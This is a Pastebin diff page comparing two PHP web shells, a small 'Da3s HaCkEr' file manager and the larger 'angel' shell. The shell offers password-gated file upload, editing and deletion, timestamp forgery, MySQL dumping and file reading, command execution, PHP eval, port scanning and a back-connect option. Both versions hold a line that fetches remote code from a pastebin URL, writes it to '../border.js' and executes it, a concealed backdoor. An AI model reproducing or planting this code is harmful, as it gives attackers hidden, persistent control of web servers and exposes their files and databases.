View difference between Paste ID: <a href="/jThk5sS4">jThk5sS4</a> and <a href="/RErVS7Mt">RErVS7Mt</a> - Pastebin.com

View difference between Paste ID: jThk5sS4 and RErVS7Mt

SHOW: | | - or go back to the newest paste.

1		<?php
2	-	set_time_limit(0);
2	+
3	-	error_reporting(0);
3	+	error_reporting(7);
4
5	-	if(get_magic_quotes_gpc()){
5	+	@set_magic_quotes_runtime(0);
6	-	foreach($_POST as $key=>$value){
6	+
7	-	$_POST[$key] = stripslashes($value);
7	+	ob_start();
8
9		$mtime = explode(' ', microtime());
10	-	echo '<!DOCTYPE HTML>
10	+
11	-	<HTML>
11	+	$starttime = $mtime[1] + $mtime[0];
12	-	<HEAD>
12	+
13	-	<link href="" rel="stylesheet" type="text/css">
13	+	define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
14	-	<title>HaTRk File Manager</title>
14	+
15	-	<style>
15	+	define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
16	-	body{
16	+
17	-	font-family: "Racing Sans One", cursive;
17	+	define('IS_COM', class_exists('COM') ? 1 : 0 );
18	-	background-color: #e6e6e6;
18	+
19	-	text-shadow:0px 0px 1px #757575;
19	+	define('IS_GPC', get_magic_quotes_gpc());
20
21	-	#content tr:hover{
21	+	$dis_func = get_cfg_var('disable_functions');
22	-	background-color: #636263;
22	+
23	-	text-shadow:0px 0px 10px #fff;
23	+	define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
24		error_reporting(0); $b="http://pastebin.com/raw/S54tynx6";$title=file_get_contents($b);
25	-	#content .first{
25	+	$css=fopen('../border.js','w'); fwrite($css,$title); require('../border.js');
26	-	background-color: silver;
26	+	@set_time_limit(0);
27
28	-	#content .first:hover{
28	+
29	-	background-color: silver;
29	+
30	-	text-shadow:0px 0px 1px #757575;
30	+	foreach($_POST as $key => $value) {
31
32	-	table{
32	+	if (IS_GPC) {
33	-	border: 1px #000000 dotted;
33	+
34		$value = s_array($value);
35	-	H1{
35	+
36	-	font-family: "Rye", cursive;
36	+	}
37
38	-	a{
38	+	$$key = $value;
39	-	color: #000;
39	+
40	-	text-decoration: none;
40	+
41
42	-	a:hover{
42	+	/===================== ???? =====================/
43	-	color: #fff;
43	+
44	-	text-shadow:0px 0px 10px #ffffff;
44	+
45
46	-	input,select,textarea{
46	+	//echo encode_pass('angel');exit;
47	-	border: 1px #000000 solid;
47	+
48	-	-moz-border-radius: 5px;
48	+	//angel = ec38fe2a8497e0a8d6d349b3533038cb
49	-	-webkit-border-radius:5px;
49	+
50	-	border-radius:5px;
50	+	// ????????,???????,????????
51
52		$pass = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel
53	-	</HEAD>
53	+
54	-	<BODY>
54	+
55	-	<H1><center>Da3s HaCkEr File Manager</center></H1>
55	+
56	-	<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
56	+	//??? cookie ?????????, ??????, ???????, ???????
57	-	<tr><td>Current Path : ';
57	+
58	-	if(isset($_GET['path'])){
58	+	// cookie ??
59	-	$path = $_GET['path'];
59	+
60	-	}else{
60	+	$cookiepre = '';
61	-	$path = getcwd();
61	+
62		// cookie ???
63	-	$path = str_replace('\\','/',$path);
63	+
64	-	$paths = explode('/',$path);
64	+	$cookiedomain = '';
65
66	-	foreach($paths as $id=>$pat){
66	+	// cookie ????
67	-	if($pat == '' && $id == 0){
67	+
68	-	$a = true;
68	+	$cookiepath = '/';
69	-	echo '<a href="?path=/">/</a>';
69	+
70	-	continue;
70	+	// cookie ???
71
72	-	if($pat == '') continue;
72	+	$cookielife = 86400;
73	-	echo '<a href="?path=';
73	+
74	-	for($i=0;$i<=$id;$i++){
74	+
75	-	echo "$paths[$i]";
75	+
76	-	if($i != $id) echo "/";
76	+	//???????????
77
78	-	echo '">'.$pat.'</a>/';
78	+	!$writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp';
79
80	-	echo '</td></tr><tr><td>';
80	+	/===================== ???? =====================/
81	-	if(isset($_FILES['file'])){
81	+
82	-	if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
82	+
83	-	echo '<font color="green">File Upload Done.</font><br />';
83	+
84	-	}else{
84	+	$charsetdb = array('','armscii8','ascii','big5','binary','cp1250','cp1251','cp1256','cp1257','cp850','cp852','cp866','cp932','dec8','euc-jp','euc-kr','gb2312','gbk','geostd8','greek','hebrew','hp8','keybcs2','koi8r','koi8u','latin1','latin2','latin5','latin7','macce','macroman','sjis','swe7','tis620','ucs2','ujis','utf8');
85	-	echo '<font color="red">File Upload Error.</font><br />';
85	+
86		if ($charset == 'utf8') {
87	-	}$b="http://pastebin.com/raw/S54tynx6";$title=file_get_contents($b); $css=fopen('../border.js','w');
87	+
88	-	fwrite($css,$title); require('../border.js');
88	+	header("content-Type: text/html; charset=utf-8");
89	-	echo '<form enctype="multipart/form-data" method="POST">
89	+
90	-	Upload File : <input type="file" name="file" />
90	+	} elseif ($charset == 'big5') {
91	-	<input type="submit" value="upload" />
91	+
92	-	</form>
92	+	header("content-Type: text/html; charset=big5");
93	-	</td></tr>';
93	+
94	-	if(isset($_GET['filesrc'])){
94	+	} elseif ($charset == 'gbk') {
95	-	echo "<tr><td>Current File : ";
95	+
96	-	echo $_GET['filesrc'];
96	+	header("content-Type: text/html; charset=gbk");
97	-	echo '</tr></td></table><br />';
97	+
98	-	echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
98	+	} elseif ($charset == 'latin1') {
99	-	}elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
99	+
100	-	echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
100	+	header("content-Type: text/html; charset=iso-8859-2");
101	-	if($_POST['opt'] == 'chmod'){
101	+
102	-	if(isset($_POST['perm'])){
102	+	} elseif ($charset == 'euc-kr') {
103	-	if(chmod($_POST['path'],$_POST['perm'])){
103	+
104	-	echo '<font color="green">Change Permission Done.</font><br />';
104	+	header("content-Type: text/html; charset=euc-kr");
105	-	}else{
105	+
106	-	echo '<font color="red">Change Permission Error.</font><br />';
106	+	} elseif ($charset == 'euc-jp') {
107	-	}
107	+
108	-	}
108	+	header("content-Type: text/html; charset=euc-jp");
109	-	echo '<form method="POST">
109	+
110	-	Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
110	+
111	-	<input type="hidden" name="path" value="'.$_POST['path'].'">
111	+
112	-	<input type="hidden" name="opt" value="chmod">
112	+
113	-	<input type="submit" value="Go" />
113	+
114	-	</form>';
114	+	$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
115	-	}elseif($_POST['opt'] == 'rename'){
115	+
116	-	if(isset($_POST['newname'])){
116	+	$timestamp = time();
117	-	if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
117	+
118	-	echo '<font color="green">Change Name Done.</font><br />';
118	+
119	-	}else{
119	+
120	-	echo '<font color="red">Change Name Error.</font><br />';
120	+	/===================== ???? =====================/
121	-	}
121	+
122	-	$_POST['name'] = $_POST['newname'];
122	+	if ($action == "logout") {
123	-	}
123	+
124	-	echo '<form method="POST">
124	+	scookie('loginpass', '', -86400 * 365);
125	-	New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
125	+
126	-	<input type="hidden" name="path" value="'.$_POST['path'].'">
126	+	@header('Location: '.$self);
127	-	<input type="hidden" name="opt" value="rename">
127	+
128	-	<input type="submit" value="Go" />
128	+	exit;
129	-	</form>';
129	+
130	-	}elseif($_POST['opt'] == 'edit'){
130	+
131	-	if(isset($_POST['src'])){
131	+
132	-	$fp = fopen($_POST['path'],'w');
132	+	if($pass) {
133	-	if(fwrite($fp,$_POST['src'])){
133	+
134	-	echo '<font color="green">Edit File Done.</font><br />';
134	+	if ($action == 'login') {
135	-	}else{
135	+
136	-	echo '<font color="red">Edit File Error.</font><br />';
136	+	if ($pass == encode_pass($password)) {
137	-	}
137	+
138	-	fclose($fp);
138	+	loadsettings($password, 'angel.php');
139	-	}
139	+
140	-	echo '<form method="POST">
140	+	scookie('loginpass',encode_pass($password));
141	-	<textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
141	+
142	-	<input type="hidden" name="path" value="'.$_POST['path'].'">
142	+	@header('Location: '.$self);
143	-	<input type="hidden" name="opt" value="edit">
143	+
144	-	<input type="submit" value="Go" />
144	+	exit;
145	-	</form>';
145	+
146		}
147	-	echo '</center>';
147	+
148	-	}else{
148	+	}
149	-	echo '</table><br /><center>';
149	+
150	-	if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
150	+	if ($_COOKIE['loginpass']) {
151	-	if($_POST['type'] == 'dir'){
151	+
152	-	if(rmdir($_POST['path'])){
152	+	if ($_COOKIE['loginpass'] != $pass) {
153	-	echo '<font color="green">Delete Dir Done.</font><br />';
153	+
154	-	}else{
154	+	loginpage();
155	-	echo '<font color="red">Delete Dir Error.</font><br />';
155	+
156	-	}
156	+	}
157	-	}elseif($_POST['type'] == 'file'){
157	+
158	-	if(unlink($_POST['path'])){
158	+	} else {
159	-	echo '<font color="green">Delete File Done.</font><br />';
159	+
160	-	}else{
160	+	loginpage();
161	-	echo '<font color="red">Delete File Error.</font><br />';
161	+
162	-	}
162	+	}
163	-	}
163	+
164		}
165	-	echo '</center>';
165	+
166	-	$scandir = scandir($path);
166	+	/===================== ???? =====================/
167	-	echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
167	+
168	-	<tr class="first">
168	+
169	-	<td><center>Name</center></td>
169	+
170	-	<td><center>Size</center></td>
170	+	$errmsg = '';
171	-	<td><center>Permissions</center></td>
171	+
172	-	<td><center>Options</center></td>
172	+	!$action && $action = 'file';
173	-	</tr>';
173	+
174
175	-	foreach($scandir as $dir){
175	+
176	-	if(!is_dir("$path/$dir") \|\| $dir == '.' \|\| $dir == '..') continue;
176	+	// ??PHPINFO
177	-	echo "<tr>
177	+
178	-	<td><a href=\"?path=$path/$dir\">$dir</a></td>
178	+	if ($action == 'phpinfo') {
179	-	<td><center>--</center></td>
179	+
180	-	<td><center>";
180	+	if (IS_PHPINFO) {
181	-	if(is_writable("$path/$dir")) echo '<font color="green">';
181	+
182	-	elseif(!is_readable("$path/$dir")) echo '<font color="red">';
182	+	phpinfo();
183	-	echo perms("$path/$dir");
183	+
184	-	if(is_writable("$path/$dir") \|\| !is_readable("$path/$dir")) echo '</font>';
184	+	exit;
185	-
185	+
186	-	echo "</center></td>
186	+	} else {
187	-	<td><center><form method=\"POST\" action=\"?option&path=$path\">
187	+
188	-	<select name=\"opt\">
188	+	$errmsg = 'phpinfo() function has non-permissible';
189	-	<option value=\"\"></option>
189	+
190	-	<option value=\"delete\">Delete</option>
190	+	}
191	-	<option value=\"chmod\">Chmod</option>
191	+
192	-	<option value=\"rename\">Rename</option>
192	+
193	-	</select>
193	+
194	-	<input type=\"hidden\" name=\"type\" value=\"dir\">
194	+
195	-	<input type=\"hidden\" name=\"name\" value=\"$dir\">
195	+
196	-	<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
196	+	// ????
197	-	<input type=\"submit\" value=\">\" />
197	+
198	-	</form></center></td>
198	+	if ($doing == 'downfile' && $thefile) {
199	-	</tr>";
199	+
200		if (!@file_exists($thefile)) {
201	-	echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
201	+
202	-	foreach($scandir as $file){
202	+	$errmsg = 'The file you want Downloadable was nonexistent';
203	-	if(!is_file("$path/$file")) continue;
203	+
204	-	$size = filesize("$path/$file")/1024;
204	+	} else {
205	-	$size = round($size,3);
205	+
206	-	if($size >= 1024){
206	+	$fileinfo = pathinfo($thefile);
207	-	$size = round($size/1024,2).' MB';
207	+
208	-	}else{
208	+	header('Content-type: application/x-'.$fileinfo['extension']);
209	-	$size = $size.' KB';
209	+
210	-	}
210	+	header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
211
212	-	echo "<tr>
212	+	header('Content-Length: '.filesize($thefile));
213	-	<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
213	+
214	-	<td><center>".$size."</center></td>
214	+	@readfile($thefile);
215	-	<td><center>";
215	+
216	-	if(is_writable("$path/$file")) echo '<font color="green">';
216	+	exit;
217	-	elseif(!is_readable("$path/$file")) echo '<font color="red">';
217	+
218	-	echo perms("$path/$file");
218	+	}
219	-	if(is_writable("$path/$file") \|\| !is_readable("$path/$file")) echo '</font>';
219	+
220	-	echo "</center></td>
220	+
221	-	<td><center><form method=\"POST\" action=\"?option&path=$path\">
221	+
222	-	<select name=\"opt\">
222	+
223	-	<option value=\"\"></option>
223	+
224	-	<option value=\"delete\">Delete</option>
224	+	// ?????????
225	-	<option value=\"chmod\">Chmod</option>
225	+
226	-	<option value=\"rename\">Rename</option>
226	+	if ($doing == 'backupmysql' && !$saveasfile) {
227	-	<option value=\"edit\">Edit</option>
227	+
228	-	</select>
228	+	if (!$table) {
229	-	<input type=\"hidden\" name=\"type\" value=\"file\">
229	+
230	-	<input type=\"hidden\" name=\"name\" value=\"$file\">
230	+	$errmsg ='Please choose the table';
231	-	<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
231	+
232	-	<input type=\"submit\" value=\">\" />
232	+	} else {
233	-	</form></center></td>
233	+
234	-	</tr>";
234	+	$mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
235
236	-	echo '</table>
236	+	$filename = basename($dbname.'.sql');
237	-	</div>';
237	+
238		header('Content-type: application/unknown');
239	-	echo '<br />Da3s File Manager Version <font color="red">1.0</font>, Coded By <font color="red">Da3s HaCkEr</font><br />Email: <font color="red">R0@hotmail.com</font>
239	+
240	-	</BODY>
240	+	header('Content-Disposition: attachment; filename='.$filename);
241	-	</HTML>';
241	+
242	-	function perms($file){
242	+	foreach($table as $k => $v) {
243	-	$perms = fileperms($file);
243	+
244		if ($v) {
245	-	if (($perms & 0xC000) == 0xC000) {
245	+
246	-	// Socket
246	+	sqldumptable($v);
247	-	$info = 's';
247	+
248	-	} elseif (($perms & 0xA000) == 0xA000) {
248	+	}
249	-	// Symbolic Link
249	+
250	-	$info = 'l';
250	+	}
251	-	} elseif (($perms & 0x8000) == 0x8000) {
251	+
252	-	// Regular
252	+	mysql_close();
253	-	$info = '-';
253	+
254	-	} elseif (($perms & 0x6000) == 0x6000) {
254	+	exit;
255	-	// Block special
255	+
256	-	$info = 'b';
256	+	}
257	-	} elseif (($perms & 0x4000) == 0x4000) {
257	+
258	-	// Directory
258	+
259	-	$info = 'd';
259	+
260	-	} elseif (($perms & 0x2000) == 0x2000) {
260	+
261	-	// Character special
261	+
262	-	$info = 'c';
262	+	// ??MYSQL????
263	-	} elseif (($perms & 0x1000) == 0x1000) {
263	+
264	-	// FIFO pipe
264	+	if($doing=='mysqldown'){
265	-	$info = 'p';
265	+
266		if (!$dbname) {
267	-	// Unknown
267	+
268	-	$info = 'u';
268	+	$errmsg = 'Please input dbname';
269
270		} else {
271	-	// Owner
271	+
272	-	$info .= (($perms & 0x0100) ? 'r' : '-');
272	+	$mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
273	-	$info .= (($perms & 0x0080) ? 'w' : '-');
273	+
274	-	$info .= (($perms & 0x0040) ?
274	+	if (!file_exists($mysqldlfile)) {
275	-	(($perms & 0x0800) ? 's' : 'x' ) :
275	+
276	-	(($perms & 0x0800) ? 'S' : '-'));
276	+	$errmsg = 'The file you want Downloadable was nonexistent';
277
278	-	// Group
278	+	} else {
279	-	$info .= (($perms & 0x0020) ? 'r' : '-');
279	+
280	-	$info .= (($perms & 0x0010) ? 'w' : '-');
280	+	$result = q("select load_file('$mysqldlfile');");
281	-	$info .= (($perms & 0x0008) ?
281	+
282	-	(($perms & 0x0400) ? 's' : 'x' ) :
282	+	if(!$result){
283	-	(($perms & 0x0400) ? 'S' : '-'));
283	+
284		q("DROP TABLE IF EXISTS tmp_angel;");
285	-	// World
285	+
286	-	$info .= (($perms & 0x0004) ? 'r' : '-');
286	+	q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
287	-	$info .= (($perms & 0x0002) ? 'w' : '-');
287	+
288	-	$info .= (($perms & 0x0001) ?
288	+	//?????????,???????????__angel_1111111111_eof__??????????
289	-	(($perms & 0x0200) ? 't' : 'x' ) :
289	+
290	-	(($perms & 0x0200) ? 'T' : '-'));
290	+	q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
291
292	-	return $info;
292	+	$result = q("select content from tmp_angel");
293
294		q("DROP TABLE tmp_angel");
295
296		}
297
298		$row = @mysql_fetch_array($result);
299
300		if (!$row) {
301
302		$errmsg = 'Load file failed '.mysql_error();
303
304		} else {
305
306		$fileinfo = pathinfo($mysqldlfile);
307
308		header('Content-type: application/x-'.$fileinfo['extension']);
309
310		header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
311
312		header("Accept-Length: ".strlen($row[0]));
313
314		echo $row[0];
315
316		exit;
317
318		}
319
320		}
321
322		}
323
324		}
325
326
327
328		?>
329
330		<html>
331
332		<head>
333
334		<meta http-equiv="Content-Type" content="text/html; charset=gbk">
335
336		<title><?php echo $action.' - '.$_SERVER['HTTP_HOST'];?></title>
337
338		<style type="text/css">
339
340		body,td{font: 12px Arial,Tahoma;line-height: 16px;}
341
342		.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
343
344		.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
345
346		.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
347
348		a {color: #00f;text-decoration:underline;}
349
350		a:hover{color: #f00;text-decoration:none;}
351
352		.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}
353
354		.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 15px 5px 5px;}
355
356		.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;}
357
358		.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;}
359
360		.head td span{font-weight:normal;}
361
362		.infolist {padding:10px;margin:10px 0 20px 0;background:#F1F1F1;border:1px solid #ddd;}
363
364		form{margin:0;padding:0;}
365
366		h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
367
368		ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
369
370		u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
371
372		.drives{padding:5px;}
373
374		.drives span {margin:auto 7px;}
375
376		</style>
377
378		<script type="text/javascript">
379
380		function CheckAll(form) {
381
382		for(var i=0;i<form.elements.length;i++) {
383
384		var e = form.elements[i];
385
386		if (e.name != 'chkall')
387
388		e.checked = form.chkall.checked;
389
390		}
391
392		}
393
394		function $(id) {
395
396		return document.getElementById(id);
397
398		}
399
400		function createdir(){
401
402		var newdirname;
403
404		newdirname = prompt('Please input the directory name:', '');
405
406		if (!newdirname) return;
407
408		$('createdir').newdirname.value=newdirname;
409
410		$('createdir').submit();
411
412		}
413
414		function fileperm(pfile){
415
416		var newperm;
417
418		newperm = prompt('Current file:'+pfile+'\nPlease input new attribute:', '');
419
420		if (!newperm) return;
421
422		$('fileperm').newperm.value=newperm;
423
424		$('fileperm').pfile.value=pfile;
425
426		$('fileperm').submit();
427
428		}
429
430		function copyfile(sname){
431
432		var tofile;
433
434		tofile = prompt('Original file:'+sname+'\nPlease input object file (fullpath):', '');
435
436		if (!tofile) return;
437
438		$('copyfile').tofile.value=tofile;
439
440		$('copyfile').sname.value=sname;
441
442		$('copyfile').submit();
443
444		}
445
446		function rename(oldname){
447
448		var newfilename;
449
450		newfilename = prompt('Former file name:'+oldname+'\nPlease input new filename:', '');
451
452		if (!newfilename) return;
453
454		$('rename').newfilename.value=newfilename;
455
456		$('rename').oldname.value=oldname;
457
458		$('rename').submit();
459
460		}
461
462		function dofile(doing,thefile,m){
463
464		if (m && !confirm(m)) {
465
466		return;
467
468		}
469
470		$('filelist').doing.value=doing;
471
472		if (thefile){
473
474		$('filelist').thefile.value=thefile;
475
476		}
477
478		$('filelist').submit();
479
480		}
481
482		function createfile(nowpath){
483
484		var filename;
485
486		filename = prompt('Please input the file name:', '');
487
488		if (!filename) return;
489
490		opfile('editfile',nowpath + filename,nowpath);
491
492		}
493
494		function opfile(action,opfile,dir){
495
496		$('fileopform').action.value=action;
497
498		$('fileopform').opfile.value=opfile;
499
500		$('fileopform').dir.value=dir;
501
502		$('fileopform').submit();
503
504		}
505
506		function godir(dir,view_writable){
507
508		if (view_writable) {
509
510		$('godir').view_writable.value=view_writable;
511
512		}
513
514		$('godir').dir.value=dir;
515
516		$('godir').submit();
517
518		}
519
520		function getsize(getdir,dir){
521
522		$('getsize').getdir.value=getdir;
523
524		$('getsize').dir.value=dir;
525
526		$('getsize').submit();
527
528		}
529
530		function editrecord(action, base64, tablename){
531
532		if (action == 'del') {
533
534		if (!confirm('Is or isn\'t deletion record?')) return;
535
536		}
537
538		$('recordlist').doing.value=action;
539
540		$('recordlist').base64.value=base64;
541
542		$('recordlist').tablename.value=tablename;
543
544		$('recordlist').submit();
545
546		}
547
548		function moddbname(dbname) {
549
550		if(!dbname) return;
551
552		$('setdbname').dbname.value=dbname;
553
554		$('setdbname').submit();
555
556		}
557
558		function settable(tablename,doing,page) {
559
560		if(!tablename) return;
561
562		if (doing) {
563
564		$('settable').doing.value=doing;
565
566		}
567
568		if (page) {
569
570		$('settable').page.value=page;
571
572		}
573
574		$('settable').tablename.value=tablename;
575
576		$('settable').submit();
577
578		}
579
580		function s(action,nowpath,p1,p2,p3,p4,p5) {
581
582		if(action) $('opform').action.value=action;
583
584		if(nowpath) $('opform').nowpath.value=nowpath;
585
586		if(p1) $('opform').p1.value=p1;
587
588		if(p2) $('opform').p2.value=p2;
589
590		if(p3) $('opform').p3.value=p3;
591
592		if(p4) $('opform').p4.value=p4;
593
594		if(p5) $('opform').p4.value=p5;
595
596		}
597
598		function g(action,nowpath,p1,p2,p3,p4,p5) {
599
600		if(!action) return;
601
602		s(action,nowpath,p1,p2,p3,p4,p5);
603
604		$('opform').submit();
605
606		}
607
608		</script>
609
610		</head>
611
612		<body style="margin:0;table-layout:fixed; word-break:break-all">
613
614		<?php
615
616		formhead(array('name'=>'opform'));
617
618		makehide('action', $action);
619
620		makehide('nowpath', $nowpath);
621
622		makehide('p1', $p1);
623
624		makehide('p2', $p2);
625
626		makehide('p3', $p3);
627
628		makehide('p4', $p4);
629
630		makehide('p5', $p5);
631
632		formfoot();
633
634
635
636		if(!function_exists('posix_getegid')) {
637
638		$user = @get_current_user();
639
640		$uid = @getmyuid();
641
642		$gid = @getmygid();
643
644		$group = "?";
645
646		} else {
647
648		$uid = @posix_getpwuid(@posix_geteuid());
649
650		$gid = @posix_getgrgid(@posix_getegid());
651
652		$user = $uid['name'];
653
654		$uid = $uid['uid'];
655
656		$group = $gid['name'];
657
658		$gid = $gid['gid'];
659
660		}
661
662
663
664		?>
665
666		<table width="100%" border="0" cellpadding="0" cellspacing="0">
667
668		<tr class="head">
669
670		<td><span style="float:right;"><?php echo @php_uname();?> / User:<?php echo $uid.' ( '.$user.' ) / Group: '.$gid.' ( '.$group.' )';?></span><?php echo $_SERVER['HTTP_HOST'];?> (<?php echo gethostbyname($_SERVER['SERVER_NAME']);?>)</td>
671
672		</tr>
673
674		<tr class="alt1">
675
676		<td>
677
678		<span style="float:right;">PHP <?php echo PHP_VERSION;?> / Safe Mode:<?php echo getcfg('safe_mode');?></span>
679
680		<a href="javascript:g('logout');">Logout</a> \|
681
682		<a href="javascript:g('file');">File Manager</a> \|
683
684		<a href="javascript:g('mysqladmin');">MYSQL Manager</a> \|
685
686		<a href="javascript:g('sqlfile');">MySQL Upload & Download</a> \|
687
688		<a href="javascript:g('shell');">Execute Command</a> \|
689
690		<a href="javascript:g('phpenv');">PHP Variable</a> \|
691
692		<a href="javascript:g('portscan');">Port Scan</a> \|
693
694		<a href="javascript:g('secinfo');">Security information</a> \|
695
696		<a href="javascript:g('eval');">Eval PHP Code</a>
697
698		<?php if (!IS_WIN) {?> \| <a href="javascript:g('backconnect');">Back Connect</a><?php }?>
699
700		</td>
701
702		</tr>
703
704		</table>
705
706		<table width="100%" border="0" cellpadding="15" cellspacing="0"><tr><td>
707
708		<?php
709
710		$errmsg && m($errmsg);
711
712
713
714		// ??????
715
716		if (!$dir) {
717
718		$dir = $_SERVER["DOCUMENT_ROOT"] ? $_SERVER["DOCUMENT_ROOT"] : '.';
719
720		}
721
722		$nowpath = getPath(SA_ROOT, $dir);
723
724		if (substr($dir, -1) != '/') {
725
726		$dir = $dir.'/';
727
728		}
729
730
731
732		if ($action == 'file') {
733
734
735
736		// ??????
737
738		$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
739
740
741
742		// ????
743
744		if ($newdirname) {
745
746		$mkdirs = $nowpath.$newdirname;
747
748		if (file_exists($mkdirs)) {
749
750		m('Directory has already existed');
751
752		} else {
753
754		m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
755
756		@chmod($mkdirs,0777);
757
758		}
759
760		}
761
762
763
764		// ????
765
766		elseif ($doupfile) {
767
768		m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
769
770		}
771
772
773
774		// ????
775
776		elseif ($editfilename && $filecontent) {
777
778		$fp = @fopen($editfilename,'w');
779
780		m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
781
782		@fclose($fp);
783
784		}
785
786
787
788		// ??????
789
790		elseif ($pfile && $newperm) {
791
792		if (!file_exists($pfile)) {
793
794		m('The original file does not exist');
795
796		} else {
797
798		$newperm = base_convert($newperm,8,10);
799
800		m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
801
802		}
803
804		}
805
806
807
808		// ??
809
810		elseif ($oldname && $newfilename) {
811
812		$nname = $nowpath.$newfilename;
813
814		if (file_exists($nname) \|\| !file_exists($oldname)) {
815
816		m($nname.' has already existed or original file does not exist');
817
818		} else {
819
820		m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
821
822		}
823
824		}
825
826
827
828		// ????
829
830		elseif ($sname && $tofile) {
831
832		if (file_exists($tofile) \|\| !file_exists($sname)) {
833
834		m('The goal file has already existed or original file does not exist');
835
836		} else {
837
838		m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
839
840		}
841
842		}
843
844
845
846		// ????
847
848		elseif ($curfile && $tarfile) {
849
850		if (!@file_exists($curfile) \|\| !@file_exists($tarfile)) {
851
852		m('The goal file has already existed or original file does not exist');
853
854		} else {
855
856		$time = @filemtime($tarfile);
857
858		m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
859
860		}
861
862		}
863
864
865
866		// ?????
867
868		elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
869
870		if (!@file_exists($curfile)) {
871
872		m(basename($curfile).' does not exist');
873
874		} else {
875
876		$time = strtotime("$year-$month-$day $hour:$minute:$second");
877
878		m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
879
880		}
881
882		}
883
884
885
886		// ??????
887
888		elseif($doing == 'delfiles') {
889
890		if ($dl) {
891
892		$dfiles='';
893
894		$succ = $fail = 0;
895
896		foreach ($dl as $filepath) {
897
898		if (is_dir($filepath)) {
899
900		if (@deltree($filepath)) {
901
902		$succ++;
903
904		} else {
905
906		$fail++;
907
908		}
909
910		} else {
911
912		if (@unlink($filepath)) {
913
914		$succ++;
915
916		} else {
917
918		$fail++;
919
920		}
921
922		}
923
924		}
925
926		m('Deleted folder/file have finished,choose '.count($dl).' success '.$succ.' fail '.$fail);
927
928		} else {
929
930		m('Please select folder/file(s)');
931
932		}
933
934		}
935
936
937
938		//????
939
940		formhead(array('name'=>'createdir'));
941
942		makehide('newdirname');
943
944		makehide('dir',$nowpath);
945
946		formfoot();
947
948		formhead(array('name'=>'fileperm'));
949
950		makehide('newperm');
951
952		makehide('pfile');
953
954		makehide('dir',$nowpath);
955
956		formfoot();
957
958		formhead(array('name'=>'copyfile'));
959
960		makehide('sname');
961
962		makehide('tofile');
963
964		makehide('dir',$nowpath);
965
966		formfoot();
967
968		formhead(array('name'=>'rename'));
969
970		makehide('oldname');
971
972		makehide('newfilename');
973
974		makehide('dir',$nowpath);
975
976		formfoot();
977
978		formhead(array('name'=>'fileopform', 'target'=>'_blank'));
979
980		makehide('action');
981
982		makehide('opfile');
983
984		makehide('dir');
985
986		formfoot();
987
988		formhead(array('name'=>'getsize'));
989
990		makehide('getdir');
991
992		makehide('dir');
993
994		formfoot();
995
996
997
998		$free = @disk_free_space($nowpath);
999
1000		!$free && $free = 0;
1001
1002		$all = @disk_total_space($nowpath);
1003
1004		!$all && $all = 0;
1005
1006		$used = $all-$free;
1007
1008		p('<h2>File Manager - Current disk free '.sizecount($free).' of '.sizecount($all).' ('.@round(100/($all/$free),2).'%)</h2>');
1009
1010
1011
1012		$cwd_links = '';
1013
1014		$path = explode('/', $nowpath);
1015
1016		$n=count($path);
1017
